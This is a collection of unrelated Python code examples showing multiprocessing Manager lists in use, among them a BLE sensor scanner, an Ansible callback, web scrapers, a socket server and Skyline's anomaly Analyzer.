            if search_duratio_sec and time.time() - start_time > search_duratio_sec:
                data_iter.send(StopIteration)
                break
            # Check running flag
            if not run_flag.running:
                data_iter.send(StopIteration)
                break
            # Check MAC whitelist
            if macs and not ble_data[0] in macs:
                continue
            (data_format, data) = DataFormats.convert_data(ble_data[1])
            # Check that encoded data is valid RuuviTag data and it is sensor data
            # If data is not valid RuuviTag data add MAC to blacklist
            if data is not None:
                state = get_decoder(data_format).decode_data(data)
                if state is not None:
                    yield (ble_data[0], state)
                else:
                    log.error('Decoded data is null. MAC: %s - Raw: %s', ble_data[0], ble_data[1])
            else:
                mac_blacklist.append(ble_data[0])
Ejemplo n.º 27
0
class JobManager(threading.Thread):
    def __init__(self, num_workers, worker_name):
        threading.Thread.__init__(self, name=worker_name)

        self.pool = Pool(num_workers=num_workers, name=worker_name)

        if os.name == 'nt':
            self.in_progress_jobs = []
            self.lock = threading.RLock()
        else:
            self.in_progress_jobs = Manager().list()
            self.lock = Manager().Lock()

    def run(self):
        while 1:
            try:
                time.sleep(20)
                self.dispatch()
            except Exception:
                # Print to debug console instead of to DB.
                import traceback
                print(traceback.format_exc())

    def dispatch(self):
        raise NotImplementedError("Children must override dispatch()")

    def submit_job(self, work_unit):
        with self.lock:
            if work_unit.get_unique_key() in self.in_progress_jobs:
                return False

            self.in_progress_jobs.append(work_unit.get_unique_key())

        # Remember these shared memory references
        work_unit.in_progress_jobs = self.in_progress_jobs
        work_unit.lock = self.lock

        self.pool.submit(work_unit)

        return True
Ejemplo n.º 28
0
class CallbackModule(object):
    def __init__(self):
        self.job_id = os.environ['MY_JOB_ID']
        self.result_list = Manager().list()

    def playbook_on_start(self):
        pass

    def runner_on_failed(self, host, res, ignore_errors=False):
        self.result_list.append({
            "host": host,
            "res": res,
            "status": "failures"
        })

    def runner_on_ok(self, host, res):
        self.result_list.append({"host": host, "res": res, "status": "ok"})

    def runner_on_skipped(self, host, item=None):
        self.result_list.append({"host": host, "res": '', "status": "skipped"})

    def runner_on_unreachable(self, host, res):
        self.result_list.append({
            "host": host,
            "res": res,
            "status": "unreachable"
        })

    def playbook_on_stats(self, stats):
        """Complete: Flush log to database"""
        hosts = stats.processed.keys()
        summary = {}

        for h in hosts:
            t = stats.summarize(h)
            summary[h] = t

        task_summary = defaultdict(lambda: defaultdict(list))
        for task_execute_item in self.result_list:
            host = task_execute_item["host"]
            status = task_execute_item["status"]
            res = task_execute_item["res"]
            task_summary[host][status].append(res)

        result = {"summary": summary, "task_summary": task_summary}
        print json.dumps(result,
                         sort_keys=True,
                         indent=4,
                         separators=(',', ': '))
Ejemplo n.º 29
0
 def run(self):
     if len(self.__href_d) == 0:
         return []
     pool_size = min(cpu_count() * 4, len(self.__href_d))
     result_list = Manager().list()
     pool = Pool(pool_size)
     for district in self.__href_d:
         url = urljoin(self.url, self.__href_d[district])
         pool.apply_async(thread,
                          args=(district, url, result_list),
                          error_callback=lambda e: println(e))
     pool.close()
     pool.join()
     result = self.__city_data
     result_list.append(result)
     df = pd.DataFrame(result_list)
     df.columns = [
         "省", "市", "区", "住宅:二手房:价格", "住宅:二手房:环比", '住宅+新楼盘+价格', '住宅+新楼盘+环比',
         "住宅:出租:价格", "住宅:出租:环比", "商铺:二手房:价格", "商铺:二手房:环比", "商铺:出租:价格",
         "商铺:出租:环比", "办公:二手房:价格", "办公:二手房:环比", "办公:出租:价格", "办公:出租:环比"
     ]
     return result_list
Ejemplo n.º 30
0
class ParserWorld:
    def __init__(self, conf: dict):
        self.url = conf['url']
        self.currency = conf['currency']
        self.table = 'index'
        self.items = Manager().list()

    def parse(self, curr):
        symbol, name = curr.split()
        params = {"symbol": symbol}
        response = requests.get(self.url, params).text
        bs = BeautifulSoup(response, "html.parser")

        rows = bs.find('table', id='dayTable').find('tbody')
        price = rows.find('span').text
        status = add_status(
            rows.find('tr').attrs['class'][0],
            rows.find('span', class_='point_status').text, "point_dn")

        item = dict(name=name,
                    date=convert_datetime_string(rows.find('td').text),
                    price=price.replace(",", ""),
                    status=status,
                    rate=calculate_ratio(status, price.replace(",", "")))
        self.items.append(item)

    def get_items(self) -> List[dict]:
        procs = []
        for _index, curr in enumerate(self.currency):
            proc = Process(target=self.parse, args=(curr, ))
            procs.append(proc)
            proc.start()

        for proc in procs:
            proc.join()

        return self.items
Ejemplo n.º 31
0
class JobProcess(multiprocessing.Process):
    def __init__(self, thread_count, url, extime):
        multiprocessing.Process.__init__(self)
        self.thread_count = thread_count
        self.url = url
        if extime < 0:
            extime = 0
        self.extime = extime
        """这里用于产生一个共享变量List否则两个变量始终是0"""
        self.success = Manager().list()
        self.failure = Manager().list()

    def run(self):

        time.sleep(self.extime)

        works = []

        for i in range(self.thread_count):
            """这里的args非常的恶心传参(url)则会报错(url,)这样才会成功"""
            works.append(WorkThread(self.url))

        for w in works:
            w.start()
            w.join()
            if w.get_result():
                self.success.append(w.get_result())
            else:
                self.failure.append(w.get_result())
        pass

    def get_success_count(self):
        return len(self.success)

    def get_failure_count(self):
        return len(self.failure)
Ejemplo n.º 32
0
def single_process(single_ip, single_port):
    server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_sock.bind((single_ip, single_port))
    server_sock.listen(1024)
    print(f'Serving on {single_ip,str(single_port)}')

    cli_list = Manager().list()
    path_list = Manager().list()
    cli_list_list = Manager().list()

    p = Process(target=single_process_server, args=(
        cli_list,
        path_list,
    ))
    p2 = Process(target=sp_show_list, args=(cli_list_list, ))
    p.start()
    p2.start()

    while True:
        cli_sock, cli_addr = server_sock.accept()
        data = ""
        flag = 0
        while True:
            recv_data = cli_sock.recv(1024).decode("utf-8")
            if "\r\n" in recv_data:
                data += recv_data
                break
            elif recv_data == "":
                flag = 1
                break
            else:
                data += recv_data

        if flag == 1:
            cli_sock.close()
            continue
        data = data[:-2]

        print(f"Received {data!r} from {cli_addr!r}")

        if data == "list":
            cli_list_list.append(cli_sock)
        else:
            file_path = data
            cli_list.append(cli_sock)
            path_list.append(file_path)
Ejemplo n.º 33
0
class Analyzer(Thread):
    """
    The Analyzer class which controls the analyzer thread and spawned processes.
    """

    def __init__(self, parent_pid):
        """
        Initialize the Analyzer

        Create the :obj:`self.anomalous_metrics` list

        Create the :obj:`self.exceptions_q` queue

        Create the :obj:`self.anomaly_breakdown_q` queue

        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()
        self.mirage_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        Multiple get the assigned_metrics to the process from Redis.

        For each metric:

        - unpack the `raw_timeseries` for the metric.
        - Analyse each timeseries against `ALGORITHMS` to determine if it is
          anomalous.
        - If anomalous add it to the :obj:`self.anomalous_metrics` list
        - Add what algorithms triggered to the :obj:`self.anomaly_breakdown_q`
          queue
        - If :mod:`settings.ENABLE_CRUCIBLE` is ``True``:

          - Add a crucible data file with the details about the timeseries and
            anomaly.
          - Write the timeseries to a json file for crucible.

        Add keys and values to the queue so the parent process can collate for:\n
        * :py:obj:`self.anomaly_breakdown_q`
        * :py:obj:`self.exceptions_q`
        """

        spin_start = time()
        logger.info('spin_process started')

        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = min(len(unique_metrics), i * keys_per_processor)
        # Fix analyzer worker metric assignment #94
        # https://github.com/etsy/skyline/pull/94 @languitar:worker-fix
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    triggered_algorithms = []
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1
                            triggered_algorithms.append(algorithm)

                    # If Crucible or Panorama are enabled determine details
                    determine_anomaly_details = False
                    if settings.ENABLE_CRUCIBLE and settings.ANALYZER_CRUCIBLE_ENABLED:
                        determine_anomaly_details = True
                    if settings.PANORAMA_ENABLED:
                        determine_anomaly_details = True

                    if determine_anomaly_details:
                        metric_timestamp = str(int(timeseries[-1][0]))
                        from_timestamp = str(int(timeseries[1][0]))
                        timeseries_dir = base_name.replace('.', '/')

                    # If Panorama is enabled - create a Panorama check
                    if settings.PANORAMA_ENABLED:
                        if not os.path.exists(settings.PANORAMA_CHECK_PATH):
                            if python_version == 2:
                                mode_arg = int('0755')
                            if python_version == 3:
                                mode_arg = mode=0o755
                            os.makedirs(settings.PANORAMA_CHECK_PATH, mode_arg)

                        # Note:
                        # The values are enclosed is single quoted intentionally
                        # as the imp.load_source used results in a shift in the
                        # decimal position when double quoted, e.g.
                        # value = "5622.0" gets imported as
                        # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                        # single quoting results in the desired,
                        # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
                        added_at = str(int(time()))
                        source = 'graphite'
                        panaroma_anomaly_data = 'metric = \'%s\'\n' \
                                                'value = \'%s\'\n' \
                                                'from_timestamp = \'%s\'\n' \
                                                'metric_timestamp = \'%s\'\n' \
                                                'algorithms = %s\n' \
                                                'triggered_algorithms = %s\n' \
                                                'app = \'%s\'\n' \
                                                'source = \'%s\'\n' \
                                                'added_by = \'%s\'\n' \
                                                'added_at = \'%s\'\n' \
                            % (base_name, str(datapoint), from_timestamp,
                               metric_timestamp, str(settings.ALGORITHMS),
                               triggered_algorithms, skyline_app, source,
                               this_host, added_at)

                        # Create an anomaly file with details about the anomaly
                        panaroma_anomaly_file = '%s/%s.%s.txt' % (
                            settings.PANORAMA_CHECK_PATH, added_at,
                            base_name)
                        try:
                            write_data_to_file(
                                skyline_app, panaroma_anomaly_file, 'w',
                                panaroma_anomaly_data)
                            logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file))
                        except:
                            logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
                            logger.info(traceback.format_exc())

                    # If Crucible is enabled - save timeseries and create a
                    # Crucible check
                    if settings.ENABLE_CRUCIBLE and settings.ANALYZER_CRUCIBLE_ENABLED:
                        crucible_anomaly_dir = settings.CRUCIBLE_DATA_FOLDER + '/' + timeseries_dir + '/' + metric_timestamp
                        if not os.path.exists(crucible_anomaly_dir):
                            if python_version == 2:
                                mode_arg = int('0755')
                            if python_version == 3:
                                mode_arg = mode=0o755
                            os.makedirs(crucible_anomaly_dir, mode_arg)

                        # Note:
                        # The values are enclosed is single quoted intentionally
                        # as the imp.load_source used in crucible results in a
                        # shift in the decimal position when double quoted, e.g.
                        # value = "5622.0" gets imported as
                        # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                        # single quoting results in the desired,
                        # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0

                        crucible_anomaly_data = 'metric = \'%s\'\n' \
                                                'value = \'%s\'\n' \
                                                'from_timestamp = \'%s\'\n' \
                                                'metric_timestamp = \'%s\'\n' \
                                                'algorithms = %s\n' \
                                                'triggered_algorithms = %s\n' \
                                                'anomaly_dir = \'%s\'\n' \
                                                'graphite_metric = True\n' \
                                                'run_crucible_tests = False\n' \
                                                'added_by = \'%s\'\n' \
                                                'added_at = \'%s\'\n' \
                            % (base_name, str(datapoint), from_timestamp,
                               metric_timestamp, str(settings.ALGORITHMS),
                               triggered_algorithms, crucible_anomaly_dir,
                               skyline_app, metric_timestamp)

                        # Create an anomaly file with details about the anomaly
                        crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, base_name)
                        try:
                            write_data_to_file(
                                skyline_app, crucible_anomaly_file, 'w',
                                crucible_anomaly_data)
                            logger.info('added crucible anomaly file :: %s' % (crucible_anomaly_file))
                        except:
                            logger.error('error :: failed to add crucible anomaly file :: %s' % (crucible_anomaly_file))
                            logger.info(traceback.format_exc())

                        # Create timeseries json file with the timeseries
                        json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name)
                        timeseries_json = str(timeseries).replace('[', '(').replace(']', ')')
                        try:
                            write_data_to_file(skyline_app, json_file, 'w', timeseries_json)
                            logger.info('added crucible timeseries file :: %s' % (json_file))
                        except:
                            logger.error('error :: failed to add crucible timeseries file :: %s' % (json_file))
                            logger.info(traceback.format_exc())

                        # Create a crucible check file
                        crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, base_name)
                        try:
                            write_data_to_file(
                                skyline_app, crucible_check_file, 'w',
                                crucible_anomaly_data)
                            logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp))
                        except:
                            logger.error('error :: failed to add crucible check file :: %s' % (crucible_check_file))
                            logger.info(traceback.format_exc())

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

        spin_end = time() - spin_start
        logger.info('spin_process took %.2f seconds' % spin_end)

    def run(self):
        """
        - Called when the process intializes.

        - Determine if Redis is up and discover the number of `unique metrics`.

        - Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES`
          and assign each process a set of metrics to analyse for anomalies.

        - Wait for the processes to finish.

        - Determine whether if any anomalous metrics require:

            - Alerting on (and set `EXPIRATION_TIME` key in Redis for alert).
            - Feed to another module e.g. mirage.
            - Alert to syslog.

        - Populate the webapp json with the anomalous_metrics details.

        - Log the details about the run to the skyline analyzer log.

        - Send skyline.analyzer metrics to `GRAPHITE_HOST`
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
                pass

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
                pass
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        if not os.path.exists(settings.SKYLINE_TMP_DIR):
            if python_version == 2:
                mode_arg = int('0755')
            if python_version == 3:
                mode_arg = mode=0o755
            os.makedirs(settings.SKYLINE_TMP_DIR, mode_arg)

        # Initiate the algorithm timings if Analyzer is configured to send the
        # algorithm_breakdown metrics with ENABLE_ALGORITHM_RUN_METRICS
        algorithm_tmp_file_prefix = settings.SKYLINE_TMP_DIR + '/' + skyline_app + '.'
        algorithms_to_time = []
        if send_algorithm_run_metrics:
            algorithms_to_time = settings.ALGORITHMS

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Report app up
            self.redis_conn.setex(skyline_app, 120, now)

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Using count files rather that multiprocessing.Value to enable metrics for
            # metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'
                # with open(algorithm_count_file, 'a') as f:
                with open(algorithm_count_file, 'w') as f:
                    pass
                with open(algorithm_timings_file, 'w') as f:
                    pass

            # Remove any existing algorithm.error files from any previous runs
            # that did not cleanup for any reason
            pattern = '%s.*.algorithm.error' % skyline_app
            try:
                for f in os.listdir(settings.SKYLINE_TMP_DIR):
                    if re.search(pattern, f):
                        try:
                            os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
                            logger.info('cleaning up old error file - %s' % (str(f)))
                        except OSError:
                            pass
            except:
                logger.error('failed to cleanup algorithm.error files ' + traceback.format_exc())

            # Spawn processes
            pids = []
            spawned_pids = []
            pid_count = 0
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.ANALYZER_PROCESSES)))
                p.start()
                spawned_pids.append(p.pid)

            # Send wait signal to zombie processes
            # for p in pids:
            #     p.join()
            # Self monitor processes and terminate if any spin_process has run
            # for longer than 180 seconds - 20160512 @earthgecko
            p_starts = time()
            while time() - p_starts <= settings.MAX_ANALYZER_PROCESS_RUNTIME:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.ANALYZER_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
                for p in pids:
                    p.terminate()
                    p.join()

            # Log the last reported error by any algorithms that errored in the
            # spawned processes from algorithms.py
            for completed_pid in spawned_pids:
                logger.info('spin_process with pid %s completed' % (str(completed_pid)))
                for algorithm in settings.ALGORITHMS:
                    algorithm_error_file = '%s/%s.%s.%s.algorithm.error' % (
                        settings.SKYLINE_TMP_DIR, skyline_app,
                        str(completed_pid), algorithm)
                    if os.path.isfile(algorithm_error_file):
                        logger.info(
                            'error - spin_process with pid %s has reported an error with the %s algorithm' % (
                                str(completed_pid), algorithm))
                        try:
                            with open(algorithm_error_file, 'r') as f:
                                error_string = f.read()
                            logger.error('%s' % str(error_string))
                        except:
                            logger.error('failed to read %s error file' % algorithm)
                        try:
                            os.remove(algorithm_error_file)
                        except OSError:
                            pass

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Send alerts
            if settings.ENABLE_ALERTS:
                for alert in settings.ALERTS:
                    for metric in self.anomalous_metrics:
                        ALERT_MATCH_PATTERN = alert[0]
                        METRIC_PATTERN = metric[1]
                        alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
                        pattern_match = alert_match_pattern.match(METRIC_PATTERN)
                        if pattern_match:
                            cache_key = 'last_alert.%s.%s' % (alert[1], metric[1])
                            try:
                                last_alert = self.redis_conn.get(cache_key)
                                if not last_alert:
                                    try:
                                        SECOND_ORDER_RESOLUTION_FULL_DURATION = alert[3]
                                        logger.info('mirage check      :: %s' % (metric[1]))
                                        # Write anomalous metric to test at second
                                        # order resolution by crucible to the check
                                        # file
                                        metric_timestamp = int(time())
                                        anomaly_check_file = '%s/%s.%s.txt' % (settings.MIRAGE_CHECK_PATH, metric_timestamp, metric[1])
                                        with open(anomaly_check_file, 'w') as fh:
                                            # metric_name, anomalous datapoint, hours to resolve, timestamp
                                            fh.write('metric = "%s"\nvalue = "%s"\nhours_to_resolve = "%s"\nmetric_timestamp = "%s"\n' % (metric[1], metric[0], alert[3], metric_timestamp))
                                        if python_version == 2:
                                            mode_arg = int('0644')
                                        if python_version == 3:
                                            mode_arg = '0o644'
                                        os.chmod(anomaly_check_file, mode_arg)

                                        logger.info('added mirage check :: %s,%s,%s' % (metric[1], metric[0], alert[3]))
                                        # Add to the mirage_metrics list
                                        base_name = METRIC_PATTERN.replace(settings.FULL_NAMESPACE, '', 1)
                                        metric = [metric[0], base_name]
                                        self.mirage_metrics.append(metric)
                                        # Alert for analyzer if enabled
                                        if settings.ENABLE_FULL_DURATION_ALERTS:
                                            self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
                                            trigger_alert(alert, metric)
                                    except:
                                        self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
                                        trigger_alert(alert, metric)
                            except Exception as e:
                                logger.error('error :: could not send alert: %s' % e)

            # Push to crucible
#            if len(self.crucible_anomalous_metrics) > 0:
#                logger.info('to do - push to crucible')

            # Write anomalous_metrics to static webapp directory
            if len(self.anomalous_metrics) > 0:
                filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP))
                with open(filename, 'w') as fh:
                    # Make it JSONP with a handle_data() function
                    anomalous_metrics = list(self.anomalous_metrics)
                    anomalous_metrics.sort(key=operator.itemgetter(1))
                    fh.write('handle_data(%s)' % anomalous_metrics)

            # Using count files rather that multiprocessing.Value to enable metrics for
            # metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'

                try:
                    algorithm_count_array = []
                    with open(algorithm_count_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace("'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_count_array.append(float_value)
                except:
                    algorithm_count_array = False

                if not algorithm_count_array:
                    continue

                number_of_times_algorithm_run = len(algorithm_count_array)
                logger.info(
                    'algorithm run count - %s run %s times' % (
                        algorithm, str(number_of_times_algorithm_run)))
                if number_of_times_algorithm_run == 0:
                    continue

                try:
                    algorithm_timings_array = []
                    with open(algorithm_timings_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace("'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_timings_array.append(float_value)
                except:
                    algorithm_timings_array = False

                if not algorithm_timings_array:
                    continue

                number_of_algorithm_timings = len(algorithm_timings_array)
                logger.info(
                    'algorithm timings count - %s has %s timings' % (
                        algorithm, str(number_of_algorithm_timings)))

                if number_of_algorithm_timings == 0:
                    continue

                try:
                    _sum_of_algorithm_timings = sum(algorithm_timings_array)
                except:
                    logger.error("sum error: " + traceback.format_exc())
                    _sum_of_algorithm_timings = round(0.0, 6)
                    logger.error('error - sum_of_algorithm_timings - %s' % (algorithm))
                    continue

                sum_of_algorithm_timings = round(_sum_of_algorithm_timings, 6)
                # logger.info('sum_of_algorithm_timings - %s - %.16f seconds' % (algorithm, sum_of_algorithm_timings))

                try:
                    _median_algorithm_timing = determine_median(algorithm_timings_array)
                except:
                    _median_algorithm_timing = round(0.0, 6)
                    logger.error('error - _median_algorithm_timing - %s' % (algorithm))
                    continue
                median_algorithm_timing = round(_median_algorithm_timing, 6)
                # logger.info('median_algorithm_timing - %s - %.16f seconds' % (algorithm, median_algorithm_timing))

                logger.info(
                    'algorithm timing - %s - total: %.6f - median: %.6f' % (
                        algorithm, sum_of_algorithm_timings,
                        median_algorithm_timing))
                use_namespace = skyline_app_graphite_namespace + '.algorithm_breakdown.' + algorithm
                send_metric_name = use_namespace + '.timing.times_run'
                send_graphite_metric(skyline_app, send_metric_name, str(number_of_algorithm_timings))
                send_metric_name = use_namespace + '.timing.total_time'
                send_graphite_metric(skyline_app, send_metric_name, str(sum_of_algorithm_timings))
                send_metric_name = use_namespace + '.timing.median_time'
                send_graphite_metric(skyline_app, send_metric_name, str(median_algorithm_timing))

            run_time = time() - now
            total_metrics = str(len(unique_metrics))
            total_analyzed = str(len(unique_metrics) - sum(exceptions.values()))
            total_anomalies = str(len(self.anomalous_metrics))

            # Log progress
            logger.info('seconds to run    :: %.2f' % run_time)
            logger.info('total metrics     :: %s' % total_metrics)
            logger.info('total analyzed    :: %s' % total_analyzed)
            logger.info('total anomalies   :: %s' % total_anomalies)
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            graphite_run_time = '%.2f' % run_time
            send_metric_name = skyline_app_graphite_namespace + '.run_time'
            send_graphite_metric(skyline_app, send_metric_name, graphite_run_time)

            send_metric_name = skyline_app_graphite_namespace + '.total_analyzed'
            send_graphite_metric(skyline_app, send_metric_name, total_analyzed)

            send_metric_name = skyline_app_graphite_namespace + '.total_anomalies'
            send_graphite_metric(skyline_app, send_metric_name, total_anomalies)

            send_metric_name = skyline_app_graphite_namespace + '.total_metrics'
            send_graphite_metric(skyline_app, send_metric_name, total_metrics)
            for key, value in exceptions.items():
                send_metric_name = '%s.exceptions.%s' % (skyline_app_graphite_namespace, key)
                send_graphite_metric(skyline_app, send_metric_name, str(value))
            for key, value in anomaly_breakdown.items():
                send_metric_name = '%s.anomaly_breakdown.%s' % (skyline_app_graphite_namespace, key)
                send_graphite_metric(skyline_app, send_metric_name, str(value))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                send_metric_name = skyline_app_graphite_namespace + '.duration'
                send_graphite_metric(skyline_app, send_metric_name, str(time_human))

                send_metric_name = skyline_app_graphite_namespace + '.projected'
                send_graphite_metric(skyline_app, send_metric_name, str(projected))

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            # if time() - now < 5:
            #    logger.info('sleeping due to low run time...')
            #    sleep(10)
            # @modified 20160504 - @earthgecko - development internal ref #1338, #1340)
            # Etsy's original for this was a value of 5 seconds which does
            # not make skyline Analyzer very efficient in terms of installations
            # where 100s of 1000s of metrics are being analyzed.  This lead to
            # Analyzer running over several metrics multiple time in a minute
            # and always working.  Therefore this was changed from if you took
            # less than 5 seconds to run only then sleep.  This behaviour
            # resulted in Analyzer analysing a few 1000 metrics in 9 seconds and
            # then doing it again and again in a single minute.  Therefore the
            # ANALYZER_OPTIMUM_RUN_DURATION setting was added to allow this to
            # self optimise in cases where skyline is NOT deployed to analyze
            # 100s of 1000s of metrics.  This relates to optimising performance
            # for any deployments in the few 1000s and 60 second resolution
            # area, e.g. smaller and local deployments.
            process_runtime = time() - now
            analyzer_optimum_run_duration = settings.ANALYZER_OPTIMUM_RUN_DURATION
            if process_runtime < analyzer_optimum_run_duration:
                sleep_for = (analyzer_optimum_run_duration - process_runtime)
                logger.info('sleeping for %.2f seconds due to low run time...' % sleep_for)
                sleep(sleep_for)
Ejemplo n.º 34
0
class load(object):
    
    def __init__(self, imagename, catalogname, 
                 width=1, beam=None, delimiter=",", 
                 verbosity=0, beam2pix=False, cores=2):

        self.log = utils.logger(verbosity)
        self.active = Manager().Value("d", 0)
        self.cores = cores

        self.log.info("Laoding Image data and catalog info")

        self.imagename = imagename
        self.catalogname = catalogname
        self.delimiter = delimiter

        # Load data
        self.catalog = numpy.loadtxt(self.catalogname, delimiter=self.delimiter)
        self.nprofs = len(self.catalog)
        
        self.data, self.hdr, self.wcs = utils.loadFits(imagename)

        self.ndim = self.hdr["naxis"]
        self.centre = self.wcs.getCentreWCSCoords()

        self.log.info("Image Centre RA,DEC {:+.3g}, {:+.3g} Deg".format(*self.centre))
        
        cubeslice = [slice(None)]*self.ndim
        if self.ndim >3:
            stokes_ind = self.ndim - utils.fitsInd(self.hdr, "STOKES")
            cubeslice[stokes_ind] = 0

        self.cube = self.data[cubeslice]

        self.profiles = Manager().list([])
        self.weights = Manager().Value("d", 0)

        ind = utils.fitsInd(self.hdr, "FREQ")
        self.crpix = self.hdr["crpix%d"%ind]
        self.crval = self.hdr["crval%d"%ind]
        self.dfreq = self.hdr["cdelt%d"%ind]
        self.freq0 = self.crval + (self.crpix-1)*self.dfreq
        self.nchan = self.hdr["naxis%d"%ind]
        self.width = int(width*1e6/self.dfreq)

        # Find restoring beam in FITS header if not specified
        if isinstance(beam, (float, int)):
            if beam==0:
                beam = None
